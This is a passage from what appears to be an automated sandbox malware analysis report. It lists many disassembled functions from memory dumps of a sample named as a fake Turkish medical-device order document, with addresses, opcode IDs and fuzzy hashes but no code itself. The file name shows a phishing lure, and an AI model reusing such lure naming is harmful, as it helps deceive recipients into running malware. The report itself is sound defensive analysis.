                                                                                                    • Instruction Fuzzy Hash: 8D51A378E01208CFCB48DFA9D59499DBBF2FF89305B208569E815AB324DB31AD42CF50
                                                                                                    Function 028441A1 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7dafca434e9ddcf3a7cfc732384cfa725e77532d214bcbe1ac5ea3242e979615
                                                                                                    • Instruction ID: 493c5f22b90be58820475c396ad27661e2b0d3c32f3e66e7a16cae5701a7873d
                                                                                                    • Opcode Fuzzy Hash: 7dafca434e9ddcf3a7cfc732384cfa725e77532d214bcbe1ac5ea3242e979615
                                                                                                    • Instruction Fuzzy Hash: 3651A378E01208CFCB48DFA9D59499DBBF2FF89305B208569E815AB324DB31AD42CF50
                                                                                                    Function 0284D557 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e8471ebee03b2fe3475a2324a60dbe0adced642c649e1f7ae2ff34c5c10bca77
                                                                                                    • Instruction ID: 11903498959439c2901af772caaa8514a10f02b21f5539343349182d92c86801
                                                                                                    • Opcode Fuzzy Hash: e8471ebee03b2fe3475a2324a60dbe0adced642c649e1f7ae2ff34c5c10bca77
                                                                                                    • Instruction Fuzzy Hash: 07517474E01208DFDB58DFAAD584A9DBBF2FF89300F249169E419AB365DB319905CF40
                                                                                                    Function 0284A303 Relevance: .1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7b24cf3f77febaaeab9a6f37df7223356f390ee956d1f2c23695192b730e67ad
                                                                                                    • Instruction ID: 137f36f756a14776a474b5cad977940f7378da3eff6cac741112758b941a5386
                                                                                                    • Opcode Fuzzy Hash: 7b24cf3f77febaaeab9a6f37df7223356f390ee956d1f2c23695192b730e67ad
                                                                                                    • Instruction Fuzzy Hash: 05419E39A4024DDFCF19CFA4C854A9DBBB2BF49314F048056E909EF291DB35A914CB50
                                                                                                    Function 02843CB1 Relevance: .1, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 86f8175897be1a17e519737ae6ed05797e3e9ad03dfa7bf2356f3941cb074532
                                                                                                    • Instruction ID: 2dff1c809d533dc1f4fe43bde7f069f834f4155d485d3806e53c7f4fcccc62e6
                                                                                                    • Opcode Fuzzy Hash: 86f8175897be1a17e519737ae6ed05797e3e9ad03dfa7bf2356f3941cb074532
                                                                                                    • Instruction Fuzzy Hash: 9E31383DB0022C8BDF1C4669889437E6AA6ABC4314F3840BEE91BC7390DF79DD458791
                                                                                                    Function 02848EF8 Relevance: .1, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f33429531b589055757fc56dca6d6b0715d2d1569f9769592d799a215778e3cf
                                                                                                    • Instruction ID: d4c026224a78a75eb31a7e418327be5595c613842740d87c473115bd98110f6d
                                                                                                    • Opcode Fuzzy Hash: f33429531b589055757fc56dca6d6b0715d2d1569f9769592d799a215778e3cf
                                                                                                    • Instruction Fuzzy Hash: F031B03C30411A8FCB298F29DC6463E7B67FB89704B1446AAE11ADB792EF29DC40C751
                                                                                                    Function 02849C30 Relevance: .1, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8cbe7fcd1682fc058b167be7c62503c42405cb828884fb5dc02e0877fb00dc75
                                                                                                    • Instruction ID: 5b875ee7fea04d8c552ce8e2339833bfedf598d91d6a2a85dea053429dbc92cb
                                                                                                    • Opcode Fuzzy Hash: 8cbe7fcd1682fc058b167be7c62503c42405cb828884fb5dc02e0877fb00dc75
                                                                                                    • Instruction Fuzzy Hash: 88416D387042598FEB21CF68C884B6B7BE6EB89304F548466E90CCB2A5DB75ED41CB51
                                                                                                    Function 02845658 Relevance: .1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 584a43053430b4ef33a57d37973fab25e294a1dcdc82f7c347ddaa494231a481
                                                                                                    • Instruction ID: 813deb3a94df0df525dbccc73b43a7c2eecedcaad3b0876b99ca613d6841ccf3
                                                                                                    • Opcode Fuzzy Hash: 584a43053430b4ef33a57d37973fab25e294a1dcdc82f7c347ddaa494231a481
                                                                                                    • Instruction Fuzzy Hash: F131703920414DAFDF05AFA4D858A6E3BA2FB48314F404025F919D7355DF39DE11DB90
                                                                                                    Function 02848380 Relevance: .1, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24d6580f37c0d8169aa4ddf579677050ec6e1fc0fc368c24feeabf30597ceaf0
                                                                                                    • Instruction ID: 475d44308bf7339edd81558da5d93fa65f915cebf922f3329be5f8e6002aac37
                                                                                                    • Opcode Fuzzy Hash: 24d6580f37c0d8169aa4ddf579677050ec6e1fc0fc368c24feeabf30597ceaf0
                                                                                                    • Instruction Fuzzy Hash: 58218E3C3042494BEB145A66886873E7697EFC5B5DF94C039D50ACB798EF6ACC42D381
                                                                                                    Function 02848370 Relevance: .1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0d2d94b317f09c33dc7162cf4d240ebcd7cbae86a1b1c0668640a1fff43d17c5
                                                                                                    • Instruction ID: 6e646fd63fc2d07eaf85472ec6331d6b70b2292cc0a7b131af8be946664146d9
                                                                                                    • Opcode Fuzzy Hash: 0d2d94b317f09c33dc7162cf4d240ebcd7cbae86a1b1c0668640a1fff43d17c5
                                                                                                    • Instruction Fuzzy Hash: D921C27C3042498BDB151B759C6873E3697AFC964DB94C079D50ACB3A9EF29CC41D341
                                                                                                    Function 02848EBE Relevance: .1, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c2dbed918eb4418d1f60d6e006c5ac496941b8d67a7dd8876a5140fda1626285
                                                                                                    • Instruction ID: c4cf2ce4d37fe95bf39a831c81e8f381132c70424ab225cff2a8c65a30936f89
                                                                                                    • Opcode Fuzzy Hash: c2dbed918eb4418d1f60d6e006c5ac496941b8d67a7dd8876a5140fda1626285
                                                                                                    • Instruction Fuzzy Hash: 7C21A235A00248CFEB24DBA4CC54B9D7B72EF84304F2085AED106A7792CF359E429B21
                                                                                                    Function 028428F0 Relevance: .1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b01727360936e613cb0ff926d5134f3708860d4cf10c1e22f3f33c6bdce4f26f
                                                                                                    • Instruction ID: fc43278daa629e2acda9a4c70cd72c155d0ae54d173cf095dd338f9dca48e343
                                                                                                    • Opcode Fuzzy Hash: b01727360936e613cb0ff926d5134f3708860d4cf10c1e22f3f33c6bdce4f26f
                                                                                                    • Instruction Fuzzy Hash: 29216239A0011ADFCB14DB64C440AAE7BB5EF9D260B20C459E819DB248DF31EA46CBD1
                                                                                                    Function 02846300 Relevance: .1, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7ac4dd0afdc36683cf1b72a15a1692f26c467a453017757039e3a3c5ffe126f7
                                                                                                    • Instruction ID: 8e8285bf7243165cc5f36ffc84681d1b6390914acc7a18fbbd6d437b7c40eb90
                                                                                                    • Opcode Fuzzy Hash: 7ac4dd0afdc36683cf1b72a15a1692f26c467a453017757039e3a3c5ffe126f7
                                                                                                    • Instruction Fuzzy Hash: D521083D3015658FD7145A29D45492EB7AAFFC675D7094069E81ADB354DF31DC01CB80
                                                                                                    Function 00CAD044 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4682610696.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_cad000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b2829a81a18ec63504d605aaab215a865c9aa173a0ae42bb920a33dfe99b9c0f
                                                                                                    • Instruction ID: 09c3080b4a93001aa91890fa1fc20f0103af8f4941aaac8a111f08db36959359
                                                                                                    • Opcode Fuzzy Hash: b2829a81a18ec63504d605aaab215a865c9aa173a0ae42bb920a33dfe99b9c0f
                                                                                                    • Instruction Fuzzy Hash: 8A214675504305EFCB14CF20D9C0B26BB61FB89318F20C56DE94B4B652C77AD846CB62
                                                                                                    Function 02845649 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 09348b8fa0a3ab2226506e5b65043c2ba4c389ca3d5a5376920ffa9ee73ee03c
                                                                                                    • Instruction ID: b95ab48cba8eacbcbfc940edcc3ede890a77eb17679d40f7a3e421a3287bf0aa
                                                                                                    • Opcode Fuzzy Hash: 09348b8fa0a3ab2226506e5b65043c2ba4c389ca3d5a5376920ffa9ee73ee03c
                                                                                                    • Instruction Fuzzy Hash: 8A21FF3920914C9FDB04AFA4E458A6E3BA1EB58318F004069F809CB349DF78DE55DB90
                                                                                                    Function 02849761 Relevance: .1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0a24172eed075b2dd1917b6a5b5fa224c4054c5506da23dea2d3148a99a5e734
                                                                                                    • Instruction ID: 1417958ccbba4903225841c910d96eaef82ab883432905a419a7adbd6786950f
                                                                                                    • Opcode Fuzzy Hash: 0a24172eed075b2dd1917b6a5b5fa224c4054c5506da23dea2d3148a99a5e734
                                                                                                    • Instruction Fuzzy Hash: 28216638E002489FDB15DFA5E594AAEBFB6AF49204F248069E415E6394DB34DE41DB20
                                                                                                    Function 028462F0 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c7a87408acf020de6099d140bd3539eaed444d921c7716323f33ea3b7e3051c2
                                                                                                    • Instruction ID: d2997741105a1ca7794c9c7b8cfe4c122df575a8547a589354d36cafed60afbc
                                                                                                    • Opcode Fuzzy Hash: c7a87408acf020de6099d140bd3539eaed444d921c7716323f33ea3b7e3051c2
                                                                                                    • Instruction Fuzzy Hash: 151136393056658FC7155A29D46852EB7A6FFC679930D40BEE81ACB360EF20DC02C790
                                                                                                    Function 0284F658 Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 48aaba83e269e8b90e8971527a5708ededcb3f13d91190924585ca0047c98d02
                                                                                                    • Instruction ID: efe0f983ba3190aac221f46318182937fe0261a5c769380d596456252e639ddf
                                                                                                    • Opcode Fuzzy Hash: 48aaba83e269e8b90e8971527a5708ededcb3f13d91190924585ca0047c98d02
                                                                                                    • Instruction Fuzzy Hash: 0221817490024ACFDB09DF68D84478E7FB2FF85304F1192ADC154AB265DBB49A45DF81
                                                                                                    Function 0284F668 Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8df1e5d8d4fddfa95ebf1dfe7918c3c608135fdeac8a75ff78ed46e067429dc4
                                                                                                    • Instruction ID: af386f4769157d47c31249941650867ae83545a65b6839790b26eaa6434da6c7
                                                                                                    • Opcode Fuzzy Hash: 8df1e5d8d4fddfa95ebf1dfe7918c3c608135fdeac8a75ff78ed46e067429dc4
                                                                                                    • Instruction Fuzzy Hash: CE115474D0010ADFDB04EFA8D84479EBFF2FB84304F1096A9C118A7265EBB49A45DF81
                                                                                                    Function 00CAD03F Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4682610696.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_cad000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                    • Instruction ID: 046d1b38b52d74b2fbcb0d238d00eb53d98696085418f4cde527cebef28659e1
                                                                                                    • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                    • Instruction Fuzzy Hash: E811D075504284CFCB11CF10C5C4B15BB72FB45318F24C6ADE84A4B652C33AD84ACF52
                                                                                                    Function 02845E98 Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 569e5a8448b3412b62cd9541dc5d8f909c47e8ba761beb20efdbbaf9a5467fb8
                                                                                                    • Instruction ID: fe68bbc2ba9cc2ffc6d62df8d2f6cd3bb346cb774268117f09345eb785106612
                                                                                                    • Opcode Fuzzy Hash: 569e5a8448b3412b62cd9541dc5d8f909c47e8ba761beb20efdbbaf9a5467fb8
                                                                                                    • Instruction Fuzzy Hash: 8E0168367041586FDB119F98E810AAF3BA7EBC9350F09801AF504C7385CF79DE119790
                                                                                                    Function 028427FF Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 956c54ce152d4775cf7d1643390e52cbd2adce1cd3ed7378905b951b2f2a48b7
                                                                                                    • Instruction ID: ae9da14668f4b78e9730d6d0760e7b02e03c31ca3038177108a8e1fc55505727
                                                                                                    • Opcode Fuzzy Hash: 956c54ce152d4775cf7d1643390e52cbd2adce1cd3ed7378905b951b2f2a48b7
                                                                                                    • Instruction Fuzzy Hash: 2E11AFB4D042098FCB00EFA9D9545EEBBF0FB49214F10526AD809F2314EB345A85CFA1
                                                                                                    Function 0284ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 284416e24b31e1af55b0136cda4a88708c8fed4bf3b3fdc8d5c9ca993fb9c450
                                                                                                    • Instruction ID: f32fbf580b82833c7b3070a363b0a8db6e8bbb48fb4a4280849f18e6dbd9e1f1
                                                                                                    • Opcode Fuzzy Hash: 284416e24b31e1af55b0136cda4a88708c8fed4bf3b3fdc8d5c9ca993fb9c450
                                                                                                    • Instruction Fuzzy Hash: 07F0963D7806184B97195E2E9874A2AB6DEEFC8A59359407AE90DCF361EF21CC02C790
                                                                                                    Function 02849D59 Relevance: .0, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 091553a2bb10a482d913733465fbea6b993a0f34ae99a93b0a22fe5dc604f683
                                                                                                    • Instruction ID: 478a8246f447a1c7397a2dc2bc2ba0c3e7e8694bbcd5c22d48f55f43ccd459da
                                                                                                    • Opcode Fuzzy Hash: 091553a2bb10a482d913733465fbea6b993a0f34ae99a93b0a22fe5dc604f683
                                                                                                    • Instruction Fuzzy Hash: 1FF068393001196FDB192AA9986097FBBDBEBCC360B144469FA0AC7351DF72CC1197A1
                                                                                                    Function 00C9D005 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4682558374.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_c9d000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae97cd62600046930ca5cf0162d38a5f70040496bf7aed896621279ee5426f1d
                                                                                                    • Instruction ID: edb59e11762a4349cbe3143f9a266dd997c38ea492424953b25fa523bf634df3
                                                                                                    • Opcode Fuzzy Hash: ae97cd62600046930ca5cf0162d38a5f70040496bf7aed896621279ee5426f1d
                                                                                                    • Instruction Fuzzy Hash: C701EC70109780AFC7128F16C855C23BFB9EF8666071A85DAE8859F263C625EC45CB61
                                                                                                    Function 0284E8F7 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f642b8cf33005168064956fa356cc8a1f17456a8ab826201f958498202913b02
                                                                                                    • Instruction ID: 019dc2129dbaaa970beff984de68b7a2cc192520e6317c846f57c0b196e2a745
                                                                                                    • Opcode Fuzzy Hash: f642b8cf33005168064956fa356cc8a1f17456a8ab826201f958498202913b02
                                                                                                    • Instruction Fuzzy Hash: 2D011678D0120AEFDB40DFA4E844AAEBBB2FB49300F1082A9D914A3354D7759A55EF91
                                                                                                    Function 00C9D01F Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4682558374.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_c9d000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f7904ddf5e14a3a56aa9e0f4686a030ae8cce8359269f3d543f9674cfac97379
                                                                                                    • Instruction ID: 10a8ddd46198b6034b48b3698a76daabe85bdbc93c70d7ebde47b84bd2ff05f9
                                                                                                    • Opcode Fuzzy Hash: f7904ddf5e14a3a56aa9e0f4686a030ae8cce8359269f3d543f9674cfac97379
                                                                                                    • Instruction Fuzzy Hash: 2CF0F976600604AF97208F0AD885C23FBADEBC4770755C59AE84A5B612C671EC42CAA0
                                                                                                    Function 02849C2C Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_2840000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fe9cf0fdb8e281d4602a52a6e483a8baa12f1b946239924d955f157f60c1ebfe
                                                                                                    • Instruction ID: 8913f1f7c0865afc64957888ef6bdf046d52895f1868860fb489a9badef91418
                                                                                                    • Opcode Fuzzy Hash: fe9cf0fdb8e281d4602a52a6e483a8baa12f1b946239924d955f157f60c1ebfe
                                                                                                    • Instruction Fuzzy Hash: CEF01C76A101189FDB109FA99848AAEBBA5EB88335F00C126E91CC7254EB758A158B91
                                                                                                    Function 028428A3 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.4683077117.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
